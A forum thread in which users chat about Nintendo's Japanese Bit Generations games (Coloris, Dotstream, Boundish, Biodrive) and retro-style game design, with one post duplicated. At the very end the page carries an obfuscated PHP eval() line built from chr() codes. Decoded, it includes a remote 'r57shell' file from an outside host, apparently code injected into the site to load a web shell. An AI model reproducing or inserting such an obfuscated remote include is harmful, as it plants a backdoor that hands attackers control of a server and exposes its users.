Sign in to follow this  
Guest 420

Nintendo Bit Generations

Guest 420

Anyone else playing the Nintendo Bit Generations series of games? http://www.nintendo.co.jp/n08/bit_g/index.html

I'm enjoying the hell out of them. Although I wish I understod the play mechanics of Coloris alittle better and I really don't get Biodrive. (I can't find english instructions). Also Boundish is alittle boring but ign says it gets much better in 2 player. http://gameboy.ign.com/articles/720/720397p1.html

That's what I'm playing :cool:

I know they're not available in the US yet but I've been very intrigued by this series since I first heard of it. Did you download them from somewhere?

These games are AWESOME. I hope that they get an official US release. What would be really cool is if they were released all together on one cartridge. Either way, I'd get them as long as the price wasn't too high.

they are fun, my fave is dotstream(a little tron-ish) Coloris makes no sence to me eather.

thejapanese packaging for them is cool.

Everytime I see the artwork on the boxes I like them even more. Great retro art :D

Games are all headed towards super-realism, and high resource requirements. It's very nice to see simpler, addictive games come out again that aren't on Yahoo! Games,etc. (those annoy me like crazy becayse they're all variations on jewel puzzle games). Game designers should go back and try designing games for older hardware or hardware with fewer goodies to test their art, kind of like how we think it's neat sometimes to make a movie in black-and-white nowadays. You should see what Ron Gilbert (Monkey Island anyone?) has to say about that here: Ron Gilbert Interview at Designer Threads on Gamespot.com

Games are all headed towards super-realism, and high resource requirements. It's very nice to see simpler, addictive games come out again that aren't on Yahoo! Games,etc. (those annoy me like crazy becayse they're all variations on jewel puzzle games). Game designers should go back and try designing games for older hardware or hardware with fewer goodies to test their art, kind of like how we think it's neat sometimes to make a movie in black-and-white nowadays. You should see what Ron Gilbert (Monkey Island anyone?) has to say about that here: Ron Gilbert Interview at Designer Threads on Gamespot.com

is cool. :w00t:

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //